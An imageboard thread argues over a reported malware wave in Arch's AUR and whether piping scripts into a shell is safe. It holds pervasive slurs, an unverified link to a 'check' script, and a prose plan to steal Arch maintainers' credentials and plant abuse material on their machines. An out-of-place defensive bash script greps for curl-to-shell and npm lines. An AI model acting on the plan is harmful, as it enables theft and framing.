/g/ - Technology
File: file.png (439 KB, 1080x1280)
1500+ MALWARE ARCH PACKAGES AND COUNTING
LAUGH AT ARCHFAGS
HAHHAHAHAHAHHAHAHAHA
>>
>>109040408
Man 2026 internet is so fucking retarded and boring.
Everything is AI, everything is posted on Cuckcord and everything is getting Hacked.
>>
Just use the AUR bro, so based it has everything, what could go wrong
>>
File: 1773731436814034.png (309 KB, 1055x845)
>>109040431
and everyone speaks ebonics.
>>
>>109040431
>Everything is AI
Skill issue. Surround yourself with better people.
>everything is posted on Cuckcord
See above.
>everything is getting Hacked.
See above.
>>
>tfw the entire AUR is malware
STOP THE COUNT
>>
File: 1778468624810584.jpg (95 KB, 904x562)
>>109040408
>user repository
>security issues
wow that's crazy
>>
File: use case pls.jpg (154 KB, 1024x1024)
>AUR
>>
>>109040518
This but unironically
With Appimage and Flatpak, why use AUR?
>>
pacman -Qm

lists two packages I installed manually long time ago.
>>
>>109040526
>Appimage
>Flatpak
Use case?
>>
File: 1781001456793169.gif (1.99 MB, 261x238)
>>109040408
that link is 404
>>
File: 1767414570743968.png (130 KB, 640x480)
>>109040536
>mfw i realize that most of "i use arch btw" trannies were running malware all this time
>>
File: rust installer.png (82 KB, 1488x600)
>>109040593
Hey that's not true, we have the best security practices out there.
>>
Needs two more threads
>>
>>109040431
Well maybe stop leveraging Rust and Gnome into fucking everything and this shit wouldn't happen.
>>
>>109040408
What the fuck? But /g/ told me only language package managers can get pwnd
>>
>>109040633
Describe what's insecure about it
>>
updooters in shambles
>>
>>109040408
>the AUR is basically just a bunch of PPAs for which Ubuntu users were ridiculed
vindicated
I'm going to reinstall Debian with the Cinnamon DE, switch over to XLibre, and use custom compiled kernels and mesa instead of going back to Ubuntu
>>
>>109040612
even their brains run malware
>>
>>109040408
>No positives
I have been using the AUR without a care in the world. I have a feeling this is going to be like the bitwarden nothing burger: Only a few people would have been affected and only under very specific circumstances. My guess is that most packages at risk are going to be deprecated or legacy/abandonware that most people would have moved on from.
>>
Said it before, will say it again, AUR is how you break Arch. Or in this case how you get pwned.
>>
>>109040431
corporations and securitards go hand by hand
>>
>>109040408
I'm baffled at the stupidity of AUR users, they deserve everything that is happening to them, I hope some of them lose their all their cryptos.
you can't be that stupid and still have money, north korea deserve it more than them.
>>109040977
you execute a script without reading it.
>>109041039
install rocky linux instead
>>
>>109040473
yeah even the ones that claim to hate them, so ironical
>>
>>109040612
new rule for internet: everything is a malware if securitard are paranoid enough about it
>>
>>109041163
I was considering Fedora Cinnamon spin, too. I don't need RHEL compatibility.
>>
>>109040977
you can't be this dumb
>>
>>109040526
Because appimages are slow and missing integration while flatpaks are bloated and designed to make money, muh premium service.
>>
>>109041181
*Everything is malware. FIFY. You should inspect anything you install/download. If you can't, then assume it's glownigger malware--either domestic/Israeli or oriental/Slavic, doesn't matter.
>inb4 "I'd rather be spied on by chinamen than-" you are choosing to be niggercattle.
>>
>>109041329
>and designed to make money, muh premium service.
And the problem is....?
>>
>>109040408
Lmao
>>
>>109040408
All those reacts are from troons
>>
>>109041683
Well, it's Discord after all.
>>
File: 1758410188558396.png (32 KB, 641x594)
>>109041683
>>
>>109040557
Safely download the apps that you need without getting cucked? Flathub is the new standard anon, get with the times sweetie.
>>
>>109040408
Anyone who installs an AUR package without checking the PKGBUILD first is a retard and should go back to windows. that's literally on par with installing an exe from a user forum posted by a stranger. anyone infected by this shit gets what they deserve for being a lazy piece of shit.
>>
>>109041727
or u could use a system that doesn't heavily rely on an absurdly prone and targeted community repo lol
>>
>>109040408
1500 vs trillions on windows
>>
>>109040518
i hate this nigger for removing the logout option i joked to my friends about usecase for it but then i set up a new arch install earlier and had to reboot after updating my sudoers file because there's no logout anymore
>>
being able to just claim packages and take over the existing one is such an unbelievably stupid idea
>>
script to check for potentially pozzed packages on your system https://cscs.pastes.sh/aurvulntest20260611.sh
>>
>>109040458
No one says this thobeit
>>
>>109041855
going to run this without reading what it does thanks
>>
>>109041855
I have no idea what any of these packages are. Most of it seems like common typosquatting that preys on illiterates
>>
File: 1764387287051196.gif (893 KB, 245x245)
>>109041727
Nine out of 10 times, a pkgbuild is only updated to serve a new release from upstream. If you want people to take checking the pkgbuild more seriously, stop bombarding users with death warning when only the pkgver and sha256sums changes
>>
>>109041163
>you execute a script without reading it
And? The desired end result is getting the compiler, an executable, on your computer, so that you can run it. That's the exact same attack vector, but even less auditable as executables are easier to check than scripts
>>109041314
I am, please enlighten me what's uniquely bad about this delivery method
>>
>>109042073
*harder to check
>>
>>109040408
>arch
only retards would fall for this. even ubuntu is better than this.
no wonder /g/ shills it so much.
>>
>>109041833
i run arch and have 0 aur packages on my machine. if it's not on the main repos, i build it myself like i would on any other distro. i've never trusted aur.
>>
>>109041556
You want to have p2w repos controlled by payment processors and corporations? Fucking clown. That should be always optional not fucking standard on Linux.
>>
This is why I use MacOS and Windows only. Linux is flawed
>>
>>109040408
You wanted the year of Linux? You shilled CachyOS for MAH GAMINGZ
You get what you deserve, you painted a target on the whole thing by shilling it and with the way AUR is designed this will never be fixed
MAH GAMINGZ distros like CachyOS having an AUR helper so retards would go and just click on shit so they never read any document, or check the package build (they can't anyways, they have no clue whatsoever how to do it) was a ticking bomb
Normie friendly Arch distros ARE A FUCKING MISTAKE
>>
>>109040526
Google playstore for linux
Deplatforming of “problematic apps”
b-but you can create your own store or host yourself!
they will make it impossible to ‘sideload’ on linux very soon like they did with android.
>>
File: 1763585238626696.jpg (323 KB, 1804x846)
>>109040408
>not using dedicated protected environments for third party shit
Ngtm, it's not like you don't have an abundance of tools for that at your hand reach, if you can't figure that out i'm afraid using linux, let alone arch, may not be of your speed.
>inb4 i don't want to tinker!
Then don't use a diy distro, run fucking atomic fedora and stick to the fucking rails you're given.
>>
>>109040526
it's a make script, nothing more, basically
>>
>>109041039
ppa is pre built
aur is you built it yourself
>>
>>109044116
they didn't do that on android though you just have to wait 24 hours
>>
>>109041725
Your distro's package manager already solves this problem.
>>
>>109040431
>everything nowadays is posted on tranny Fagcord
This.
>>
>>109042073
>And?
blind trust in yet another thing, it just adds up real fast, it's fine when you have just the code to care about, if you need to trust-check all the middle-men it gets tedious
>>
>>109045750
Blind trust in what? What middle men?
>>
>>109040518
Some things need specific packages that aren't on the main repos
>>
Supply chain attacks are the new trend. I wonder why the retards haven't figured out this earlier.
Linux distro what is forcing an update every few days is a massive security risk anyway.
Tell me water is wet faggot.
>>
>>109040431
Ubuntu lts has entered the chat
>>
>>109040473
and everyone posts reddit frogs
>>
>>109046519
the non-retards already have, and who knows what's compromised.
>>
So is this the latest 'linux is insecure' nothingburger? Who the fuck even downloads these packages? I've yet to see a single human anywhere say they've got infected
>>
>>109040518
fvwm is aur only.
>>
>>109046528
I think python and ai (torch, opencv) related library dependencies are the next big hit...
>>
>>109046581
3 phases.

1. basically what op said
2. *something* gets people to install the packages, not sure how
3. the packages are exploited for the real actual attack

It all feels very indian
>>
File: 1759951175704289.png (39 KB, 400x300)
wait a moment, isn't the Steam Deck using Arch?
I wonder if they have the AUR enabled löle
>>
>>109040431
rule 34 discord once banned me for asking about restoring images from a banned account
>>
>>109040408
>Downloading every app from its own site is stupid! Any one of them could be compromised! Centralized package repos are much better!
Looks like Windows chads win again!
>>
>>109046726
>Looks like Windows chads win again!
macchads too
>>
I've used cachyOS for about 10 months, recently quit and went back to windows because I got a bit sick and fucking tired of a few things.
I think I dodged a bullet there given I did rely on the AUR
>>
>>109040408
>which may or may not be true
>>
>>109046876
Biggest issue is that AUR is openly recommended and shilled.
If they had their shit together no one would need to use a 3rd party repository as a goddamn default. I understand for some obscure and hard to compile software it's useful but I needed to use AUR for goddamn Librewolf too.
Arch linux has always been shit and it is funny how it gets shilled here on daily basis.
>>
File: 1775809564602645.jpg (47 KB, 792x604)
>>109046726
Nah, this shit was always about third party, community managed (and unreviewed) repos. I remember the same kind of shit happened on gnome-looks.org almost 20 years ago. Main distro repos are still rock solid.
>>
>>109046928
It's mostly what advertises Arch as a good solution. It's a library of software packages which often you need to build elsewhere or fuck around with third party repos all the same, but more manually. Very small or obscure projects usually have an AUR package and then "build it yourself" if you use something else.
Reading a PKGBUILD isn't strenuous. You could live with a lot of applications in the default Arch stable repos. But it gets harder to sell if you tell people "don't use the thing that makes it a little different from others".
At this point openSUSE seems like the only reasonable replacement for that. Fedora often gets really out of date packages and they are too pushy with this "you gotta flatpak and containerize everything"
>>
>>109040408
just check what aur packages you have installed, then read the pkgbuild for each, they're about 40 lines on average. if they contain npm and npm install, lmao for you, otherwise you're fine.
>>
>>109046477
>Blind trust in what?
the fucking website you're downloading shit from, are you stupid or something?
>What middle men?
the website itself or the cdn for example, you can't trust download links on the internet hence you should read the fucking script before executing it, how is this controversial or hard to understand?
>>
>>109040882
This is the real fucking problem right here.
>>
>>109046521
>gets DDoSed for weeks
heh
>>
Jokes on you my AUR packages are years out of date.
>>
File: 8507.gif (204 KB, 220x295)
>>109040408
>All that malware
This is what happens to distros with commie logic. Eventually someone will poison the well. On the other hand
>FEDORAS ARE AWESOME
>FEDORAS ARE AWESOME
>>
>>109040612
You don't have to use AUR it's not enabled by default it's a choice.
Fucking retard.
>>
why don't they just make yay or whatever stop and say are you sure when shit like this is part of the package
>>
>>109047228
>cachy-update troons in shambles
>>
>>109044622
i miss crunchbang, it worked on almost everything
>>
File: updooter.png (240 KB, 1398x683)
>>109040408
updooter status?
>>
>>109047551
I mean, bunsenlabs is still a thing.
>>
>>109041859
>No one says this thobeit
I've heard people on /g/ say that before
>Just use arch, bro. The AUR has everything!
Yeah, except it's maintained by random retards willing to sell their credentials for a sandwich lol
>>
>>109041329
>while flatpaks are bloated and designed to make money
Could you show me who's making money selling flatpaks?
>>
>>109046592
Why on Earth would you want a window manager that makes xfce not look absolutely rancid in comparison?
>>
>>109044622
Funny that the slack guy is not at slackware
>>
>>109047029
If I want to download and use rust, that means I trust the rust team, who make it. That means I trust their website rust-lang.org. I know whoever sent the response to my GET for rust-lang.org is rust-lang.org because I used https and they have a valid certificate from a CA I trust. rust-lang.org says to install with a commandline that downloads a script from rustup.rs. The commandline also forces https, so I know rustup.rs is rustup.rs by the same mechanism. I know rustup.rs itself is not malicious because rust-lang.org, whom I trust, points to it.
I'm not blindly trusting the website, it's a chain of trust, starting from trusting the creators of rust. Because if I don't trust them then why the fuck would I even try to download rust in the first place?
Ironically the only blind step is rust team to rust-lang.org. Thankfully that's a step I can verify using multiple sources.
>you can't trust download links on the internet
Why not. What attack vector in my chain of trust is uniquely dependent on links on the internet
>>
>>109046928
>If they had their shit together
*If they wasted even more time being package jannies
This is why windows keeps being more popular
>>
>>109040408
>this 'community' 'run' package manager with zero oversight or accountability got filled with malware
amazed it took so long
>>
>>109046982
>they are too pushy with this "you gotta flatpak and containerize everything"
Instead of Fedora attempting to build a repo the size of Debian they're playing it smart. Create a container, install the things you want from other repos that have already done the work for you, export the desktop files and an unaware user won't even realize what's going on unless they open up btop and see a tiny Podman instance running. It's all set up to interact with your native config files and home directory. SELinux is set up to play nicely with all of this. There are kinks to this but the idea is solid and it already works for most things seamlessly.
Arguments about what each distro has are becoming increasingly pointless. The AUR or Ubuntu PPAs are not unique to those distros anymore and don't require VMs dedicating a bunch of system resources to use. You can even do this with Brew in case you want to NTR Macfags as well.
>>
So uh, can't they figure out who did it, revoke that access and roll packages back to the last known safe versions?
>>
>>109046519
Supply chain attacks are loud, easily noticeable, and a very “abuse it and you lose it” sort of deal.
Eventually the AUR will figure out a way to stop this one way or another and that will be that.
The more sensible strat was to be stealthy with infiltration via exploits but nowadays claude odyssey fairytale storytime v2 is going to be beating you to the punch with that.
>>
>>109045750
>blind trust in yet another thing
That's just it though, we're all running code we didn't read. I understand the sentiment of "it's bad to pipe a script from the internet into your terminal", but, that's effectively the same as running any software at all.
>>
>>109040882
I know people clown on rust, but what's the issue with gnome?
>>
>>109040408
To be fair these were abandoned packages that nobody was using.
>>
>>109042696
>Normie friendly Arch distros ARE A FUCKING MISTAKE
Fucking this. So much fucking this.
The first thing Linux users should get on a new session is an autotools directory and they need to get a clean configure and make to pass. Linux should be filtering more brainlets to limit the damage.
>>
how do I check an AUR package's PKGBUILD? Let's say I wanna inspect rhythmbox-git (an infected package); where do I look within the PKGBUILD to confirm that what I'm installing isn't malware? I can't seem to find where a malicious npm dependency would be installed, unless the AUR team removed it already.
https://aur.archlinux.org/cgit/aur.git/diff/PKGBUILD?h=rhythmbox-git
>>
File: paylmao.png (165 KB, 971x510)
>>109047773
Usual suspects.
>>
File: PROBLEM.jpg (40 KB, 250x250)
>>109048578
The h4x0rs better do this before they lose the opportunity:

Arch maintainers and AUR moderators/admins likely use Arch Linux.

Step 1:Find identifiers belonging to any maintainer, moderator, or admin who may have control over the Arch website, repo etc. This could possibly be found in support threads, mailing lists, etc. Anything that shows a home folder name or a persistent file on their computer that lets us know whether or not we have the right person

Step 2: Do your supply chain attack

Step 3: Your malicious payload should read the home directory and export critical dotfiles to a server that you control.Then hide child porn in journalctl. For extra safety tar up their Firefox profiles and upload it to the server too.

Step 4 - Assuming you h4x0red well enough, you should now have critical credentials and files belonging to Arch/AUR maintainers!

Step 5 - FUCK SHIT UP

Step 6 - PROFIT!!!

NOTE: STEPS ARE REPRODUCIBLE ACROSS ALL DISTRIBUTIONS PROVIDED YOUR SOFTWARE AUTO-UPDATES INTERNALLY WITHOUT CONSENT

u jelly?
>>
>>109047776
fvwm3 is amazing, you can do everything you want with commands.
https://www.fvwm.org/Man/fvwm3commands/
you can customize the look however you want, how the window buttons are placed, how the main menu is arranged, the sidebar, .. everything.
it reminds me of windows xp and its bazillions of themes.
https://fvwm-themes.sourceforge.net/screenshots/
it's truly a great piece of software.
>>
>>109040408
Is it called arch because they’ve bent over and arched their back?
>>
$ comm -12 <(cat infected | sort) <(pacman -Q | sed "s/ .*//g" | sort)
gtkimageview
$ pacman -Qi gtkimageview
Name : gtkimageview
Version : 1.6.4-9
Description : Simple image viewer widget for GTK2
Architecture : x86_64
URL : https://wiki.gnome.org/Projects(2f)GTK(2f)GtkImageView.html
Licenses : LGPL2.1
Groups : None
Provides : None
Depends On : gtk2
Optional Deps : None
Required By : gimp-nufraw
Optional For : None
Conflicts With : None
Replaces : None
Installed Size : 110.11 KiB
Packager : Christian Hesse <eworm@archlinux.org>
Build Date : Wed 18 Dec 2024 09:29:56 CET
Install Date : Sun 22 Dec 2024 17:59:13 CET
Install Reason : Installed as a dependency for another package
Install Script : No
Validated By : Signature

it's safe if i haven't updated this since 2024 ... right?
>>
>>109040408
Keeeeeeeekylol!!!!! So much for muh "Linux will never ever get viruses", feels good being a Win11 CHAD
>>
>>109051932
>being this wrong and thinking you're right
windoze users really are a special breed
>>
Proprietary software is often malware, but if it's happening in free software, then make a public statement and denounce it. Get rid of AUR once and for all.
>>
File: lons-dawg.gif (19 KB, 220x220)
>335 updates available
Is it safe to update yet?
>>
>>109052334
>335 aur updates
>335 random fucktards waiting to run unvetted scripts on your computer
Just uninstall arch bro
>>
>>109052439
>thousands of people say "linux is safe"
>you ask what distro to use
>everyone recommends stuff like Linux Mint, Debian, Fedora
>1 random retard recommends Arch
>you listen to the Retard
It's your fault.
>>
File: 1765583748377846.jpg (38 KB, 512x411)
>>109047582
>updooter status?
no problems on my Arch™ machine because I don't use the AUR
>>
>>109052455
Actually I was using Manjaro.
>>
Oh no nonononono linbros... I thought Linux doesn't get viruses.
Kek. Mac and even Windows are more secure than this fucking garbage. at least Windows comes with some kind of antivirus while Linux is completely unprotected and its users run curl | bash all the time
>>
>>109040408
I may be an idiot but I used Arch for a couple of years and I NEVER used the AUR. The official repositories had everything I needed.
>>
>>109052475
>worst arch
double retard
>>
>>109040487
Surround your neck with a noose.
>>
File: 1733425853723479.jpg (41 KB, 960x926)
thank god i'm on windows 10 for the next 6 years
i fear what follows
>>
Imagine not just using Debian.
>>
>>109052439
even OpenBSD isn't secure if you pipe URLs into sh and run software written by people you don't know before reading it. which is basically what the average AUR user has been doing, apparently
>secure is when i can't install something that will hack me
then use a chromebook, and install nothing
>>
You are told at every step in the Arch experience to be careful with AUR. I always was, and I don't have any of these packages installed.
>>
>>109052654
https://arstechnica.com/security/2026/02/notepad-updater-was-compromised-for-6-months-in-supply-chain-attack/
https://www.bleepingcomputer.com/news/security/jdownloader-site-hacked-to-replace-installers-with-python-rat-malware/

windows boomers hosting installers and custom updooters on their personal 2004 tier php websites are good at computers, keep downloading those exes
>>
>>109040408
how many of those were installed? also how many aur manager warnings would have been ignored when attempting to install an orphaned package?
>>
Lincux kernel itself is like 10% vibe coded now and it'll get worse
>>
>>109041727
On a server. Hosted by the project. Contributed to by the project. Branded. As the project.

But don't use it unless you're retarded.

Oh it's not "official" and shouldn't be used because it's the users problem, but we're going to take ownership of the packages and clean up the issue. Even though it's not our fault and not our problem.

This bullshit from arch devs.

I'm going back to Slackware.
>>
>>109052794
This. Shit is fucked. And it's in everything: food, medicine, furniture, construction, machinery, manufacturing, PC hardware, PC software, videogames, etc etc. This truly feels like the end of civilization, simply because no one cares anymore
>>
>>109052793
>also how many aur manager warnings would have been ignored when attempting to install an orphaned package?
They were adopted by the attacker so they weren't orphaned at the time, that's how the whole attack worked.
I had a couple of packages that I had installed from the official repos but have since then been dropped, moved to AUR and then picked up by this attacker and could've been affected if I had run updates during this whole shitshow, although I probably would've noticed the suspicious npm dependency and post-install script to install npm packages.
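Added example (not from this thread, the affected packages' maintainers, or the Arch project): a script that does what several posts above describe by hand: intersects a `pacman -Qm`-style package list with a list of affected names (as the comm(1) one-liner posted earlier does), greps a PKGBUILD for stray npm/npx tokens and curl/wget-into-shell lines, and tells whether an update changed only pkgver/pkgrel/checksum lines. All inputs are constructed samples written to a temp dir; the package names and PKGBUILD contents are made up.

```bash
#!/usr/bin/env bash
# Added example: local checks for AUR packages. All sample data below is
# constructed; nothing here is fetched from the network.

SAMPLE_DIR=$(mktemp -d)

# Constructed stand-in for `pacman -Qm` output ("name version" per line).
cat > "$SAMPLE_DIR/installed.txt" <<'EOF'
gtkimageview 1.6.4-9
deadbeef 1.9.6-1
yay 12.3.5-1
EOF

# Constructed stand-in for a published list of affected package names.
cat > "$SAMPLE_DIR/affected.txt" <<'EOF'
gtkimageview
rhythmbox-git
some-typosquat
EOF

# Constructed PKGBUILD showing the pattern the thread warns about: an npm
# makedepend the upstream project does not need, and a package() step that
# installs from the npm registry at build time.
cat > "$SAMPLE_DIR/PKGBUILD.suspicious" <<'EOF'
pkgname=example-git
pkgver=1.0
pkgrel=1
arch=('x86_64')
depends=('gtk3')
makedepends=('git' 'npm')
source=("git+https://example.invalid/example.git")
sha256sums=('SKIP')

package() {
  cd "$srcdir/example"
  make DESTDIR="$pkgdir" install
  npm install -g example-helper
}
EOF

# Constructed "before" and "after" of an ordinary upstream version bump.
cat > "$SAMPLE_DIR/PKGBUILD.old" <<'EOF'
pkgname=example
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
EOF
sed -e 's/^pkgver=1.0/pkgver=1.1/' -e 's/0000/1111/' \
  "$SAMPLE_DIR/PKGBUILD.old" > "$SAMPLE_DIR/PKGBUILD.new"

# affected_installed INSTALLED_FILE AFFECTED_FILE
# Prints names present in both files (first column of the installed list).
affected_installed() {
  awk 'NR == FNR { hit[$1]; next } ($1 in hit) { print $1 }' "$2" "$1"
}

# Lines worth a second look: a standalone npm/npx token anywhere in the file
# (dependency arrays or function bodies), or curl/wget piped into a shell.
RED_FLAG_RE='(^|[^[:alnum:]_-])(npm|npx)([^[:alnum:]_-]|$)|(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh'

# pkgbuild_red_flags PKGBUILD
# Prints "lineno:line" for each flagged line; exit status 0 if any were found.
pkgbuild_red_flags() {
  grep -nE "$RED_FLAG_RE" "$1"
}

# pkgbuild_red_flag_count PKGBUILD
# Same check, but prints a count and always exits 0 (grep -c exits 1 on zero matches).
pkgbuild_red_flag_count() {
  grep -cE "$RED_FLAG_RE" "$1" || true
}

# only_version_bump OLD_PKGBUILD NEW_PKGBUILD
# Exit 0 when every changed line is a pkgver/pkgrel/checksum assignment, so a
# diff that is only a release bump can be waved through and anything else is
# read in full. Assumes single-line checksum arrays.
only_version_bump() {
  ! diff "$1" "$2" | grep -E '^[<>]' \
    | grep -vqE '^[<>] *(pkgver|pkgrel|(sha256|sha512|b2|md5)sums(_[[:alnum:]_]+)?)='
}

echo "installed packages on the affected list:"
affected_installed "$SAMPLE_DIR/installed.txt" "$SAMPLE_DIR/affected.txt"
echo "red flags in PKGBUILD.suspicious:"
pkgbuild_red_flags "$SAMPLE_DIR/PKGBUILD.suspicious"
if only_version_bump "$SAMPLE_DIR/PKGBUILD.old" "$SAMPLE_DIR/PKGBUILD.new"; then
  echo "PKGBUILD.old -> PKGBUILD.new: only version/checksum lines changed"
fi
```

On a real Arch box, feed `pacman -Qm > installed.txt` and the PKGBUILD from your AUR helper's clone directory in place of the constructed files.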
>>
>>109040408
Feels good being on Windows
>>
>>109044622
Manjaro, Centos, and ElementaryOS being on that list really dates this image.
>>
>>109040518
Mullvad and deadbeef for me.
>>
>>109040633
all distros (including arch) ship a distro compiled rustup.
>>
>>109052692
Imagine using Debian on the desktop.
lol
lmao even
>>
Is anyone else thinking about moving away from Arch? This is getting tiring. Debian, Fedora, and OpenSUSE are looking more and more attractive as time goes on.
>>
>>109053904
Debian is "the universal operating system" which includes desktop use.
The installer comes with DE choices, the Plasma option on Trixie is especially quite good, or lxqt for lower end systems. It even comes configured really well for desktop use out of the box so you don't need to mess with anything.
>but I loveeee tinkering and editing configs :((((
>>
>>109040408
Wait until they realize that the official repos also basically have no security.
>>
>>109053949
I'm just not a masochist, but you do you
>>
>>109042554
Modern macOS security is way better than Linux and most of the supply chain attacks don't work on macOS because npm/pip don't have access to the user's home directory unless explicitly granted. It actually has sane defaults.
>>
>>109053986
There's a reason all of the big beginner friendly distros throughout history have been debian-based, I can't think of a less masochistic operating system even if I tried.
>>
>>109054001
itoddlers really live in a fantasy world, if malicious code runs on your system you are compromised, unless you just don't take security seriously.
Local filesystem permissions, kernel security, "sandboxing" etc don't work from a philosophical security perspective. You can't just get pwned and be like "oh well the malware doesn't have access to my home directory so I'm fine"
Same retardation as the recent plague of gen z retards who think running something in docker is like virtualizing it
>>
I'm a two-week linuxfag and am using cachyos since it was being shilled a lot. Legit felt like it was better than ubuntu or fedora even though I didn't even use it for gaming. I started with mint (ugly as hell), ubuntu (theming broke because of the new gnome? idk), and fedora (nvidia nightmare). I know those are fixable but I don't have the skill to do so. Somehow arch distros are the most stable for me. If you skip the AUR entirely, what are the problems?
>>
>>109041163
>you execute a script without reading it.
so not only you don't know about >>109053899 (or just pretending). but you don't even know what's actually wrong with "curl | sh". how /g/eety of you.
the actual problem with "curl | sh" is an attack where the server can detect you're piping, and use a different script from the one you would read. so if you pipe again, EVEN IF you read the script, you could be fucked anyway. if you don't pipe you should be fine.
the problem with this described attack, is that it lacks a logical threat model. because the cases are:
1. the server is operated by the script owners. and they are generally or targetingly malicious => you're fucked or will be fucked. the script doesn't matter.
2. the server is a malicious CDN, or some other kind of third party. which gives us two sub-cases:
A. the server is generally malicious. which means the script owners are both negligent and incompetent. and the product is too obscure to the point where somehow no one noticed => you're fucked anyway because you're a retard.
B. the server is targetingly malicious => you're fucked anyway and probably have bigger things to worry about
C. you're getting specifically MITMed => you're REALLY fucked and should revise your whole activity.
------
in any case, "reading the script" doesn't actually help you.
>>
>>109054050 (me)
"C." is a separate "3." point of course
>>
Gentoo GURU chads stay winning.
>>
>>109054032
None of the recent credential stealing attacks from npm worked on macOS you retard. The malware can't access the directories credentials are in, can't access the network and can't write to anywhere other than the npm package directory. They can't even install a backdoor service that runs on startup/login.

Yes, it's theoretically possible that the attackers could include a macOS jailbreak but that makes the attack significantly more difficult and is almost certainly not worth it since macOS jailbreaks sell for hundreds of thousands of dollars by themselves. A few of the attacks did include jailbreaks for Docker on Linux since most Linux users are retarded and also have insecure Docker setups.
>>
Glad that I stopped using arch and moved to windows 11 a year ago.
>>
>>109048350
Congrats on being tech illiterate and clinically retarded. Your above average result on the chromosome test is really shining through with this post.
>>
>>109048579
All package managers use asymmetric cryptography to verify origin. Running a random script does not.
>>
>>109054106
So true sister, especially since the only 2 operating systems in the world are Arch Linux and Windows 11
>>
>>109052879
The real tragedy is that actually a lot of people care (and extremely competent people at that, not grifters or mere dreamers), but they need resources that nobody wants to give them. Instead the resources goes to grifters, conmen, and nepotism.
>>
>>109054106
Windows 11 unironically has a better security model than most mutable Linux distributions.
>>
>>109054155
Clinically wintarded or pajeeted by birth?
>>
>>109054175
Explain why Linux is more secure.
>>
>>109054111
i accept your izzatbot concession on his behalf
>>
>>109054185
nta. and it's the other way around. microjeetcock doesn't try to be secure. in fact microjeetcock itself is a backdoor operator, and this of course predates enjeetification. they even install backdoors in your binaries when you use their compiler.
tbf though, if you didn't already know that. you're too retarded for you're caring to have a meaningful impact.
>>
>>109054185
You know you're wrong when the tech illiterate schizoomer >>109054207 agrees with you lmao
>>
>>109040408
Must have been the government to make everyone use the main os so they can spy on us better
>>
>>109054282
It's always been dogshit
>>
>>109054111
I'm sorry I made you feel stupid by pointing out how you're parroting shit without understanding it
>>
>>109054362
>n-no u
I accept your surrender
>>
>>109054050
>the actual problem with "curl | sh" is an attack where the server can detect you're piping, and use a different script from the one you would read. so if you pipe again, EVEN IF you read the script, you could be fucked anyway. if you don't pipe you should be fine.
yes, that's exactly what I said, are you fucking braindead or something?
you dl the script and you read it, fucking duh, if you can't trust the server why the fuck would you read the web version of the script are you stupid?
>in any case, "reading the script" doesn't actually help you.
yes it fucking does, download the script (the OBVIOUS, unsaid part) then you read it with shellcheck and utf-8 encoding activated and you manually check URLs for non-ascii chars, as simple as, you're not as smart as you think you are and your post is retarded as just downloading the script to read it makes your claude sonnet nonsense obsolete.
want me to teach you how to open a text editor? don't forget to turn on your computer too, sometimes when your monitor is black it's because you forgot to turn it on, yeah I know, computers are tricky but you'll get there without people spelling all the fucking details eventually
>>
>>109054438
It's an install script for a binary. If the server is malicious and will send you a different malicious script if you pipe it, then the server can just send you a malicious binary instead. Nothing's changed
>>
>>109054114
https does
>>
>>109054438
/me wondering if this is how jeet LLM freak out looks like
>>
>>109040408
Can someone give me a quick rundown of how this happened? Surely they aren't all maintained by the same person or whatever
>>
>>109053904
>Imagine using Debian on the desktop
I build newer kernels and mesa from source every couple weeks and it's pleasant as all fuck. Imagine being so lazy and tech illiterate that you don't.
>>
>>109041833
You could, and in fact I would encourage you to. Please go away.
>>
>>109054514
>It's an install script for a binary.
so?
>If the server is malicious and will send you a different malicious script if you pipe it
download it first you fucking mong, you won't need to pipe it.
>then the server can just send you a malicious binary instead. Nothing's changed
t.average cybersec student
change career right now.
>>109054556
this is standard european ESL text, jeets don't write like this
>>
>>109054568
nothing relevant happened.
in the AUR, anyone can upload new build scripts with a certain pkgbase/pkgname. and anyone can adopt "orphaned" (i.e. previous maintainer of a build script doesn't want to do it anymore) build scripts.
an astute meta observer would notice that arch doesn't limit users in any way within that framework. there is no ID or any form of tracking going on that would even limit a user from creating many accounts. and while this manifested as an "attack" via AUR, non-tard users should be happy that such a "free" community driven system exists.
also note that people in the tech media and e-celeb sphere are retarded. the former are usually tech illiterate, and the latter are that + ragebaiters. you shouldn't take any info from them. for example, talk of "Trusted Users" is completely off the mark. A "Trusted User" is (or was, haven't checked in a while) a rank below "developer" in Arch. it was for people who could upload packages to the community repo. those packages, as you would expect, would already exist as build scripts in the AUR since a distributed package would have to be somewhat popular. but AUR-only packages have nothing to do with "Trusted Users" (beyond general moderation, of course).
Arch doesn't have a community repo anymore. So I don't know what the current hierarchy is within the project. but i wouldn't be surprised if the "tech media" was operating on a misunderstanding of pre-2020 GPT info lol.
>>
>>109054625
NTA. and you're a retard who never saw a 'curl | sh' script.
these scripts ALWAYS fetch further stuff from the internet, often using the same servers.
but let's make this simpler. describe a precise threat model first.
>>
>>109054580
>lazy
correct, my desktop should just werk
>>
>>109054625
>>If the server is malicious and will send you a different malicious script if you pipe it
>download it first you fucking mong, you won't need to pipe it.
https://dictionary.cambridge.org/dictionary/english/if
Hope it helps
>t.average cybersec student
t. retard with no response
>>
>>109054719
executing scripts without reading them should not be seen as something simple you just do
>>
>>109040487
Is there any way to search discord servers like I can le reddit?
>>
>>109054811
Discord has a server-wide search feature, yeah
>>
>>109054719
>NTA. and you're retarded who never saw a 'curl | sh' script.
I've seen a lot of them, I just don't trust them, also I'd rather compile the software myself, if it's not in the arch repos then I compile it.
Compiling rust is trivial, like most software these days (I've been maintaining buildroot and yocto distro for over 8 years at work)
>these scripts ALWAYS fetch further stuff from the internet, often using the same servers.
yes, so? READ THEM.
>but let's make this simpler. describe a precise threat model first.
the script you download does shady stuff
the script you download is not the script you can read on their website
the pipe is corrupted (your system is already compromised anyways)
the website got dephased
the url is tricky with Il (they are different, I hope your font shows glyphs with enough differences so you don't get tricked)
>>109054783
>https://dictionary.cambridge.org/dictionary/english/if
>Hope it helps
that's not the issue with my sentence lmao, guess you natives are as braindead as non-native speakers
>t. retard with no response
it's crazy how bitter online retards are, you do realize that we agree on everything, right? you're talking about some pipe shenanigan, I'm talking about malicious scripts, both exist, you had literally 0 (ZERO) reason to be mad at my post.
>>
i have never used the AUR for anything
>>
>>109054828
>i'd rather compile the softwre myself, if it's not in the arch repos then I compile it.
that's beside the point. we already established that the example at hand (rustup) is in the arch repos anyway.
>READ THEM
read what, retard? the hex of elf binaries or other binary assets? lol
or did you think scripts can only grab other scripts, ad infinitum?
><not a threat model>
you don't even know what a threat model is. and the way you formulate things ("the script you can read on their website") further proves your general tech illiteracy.
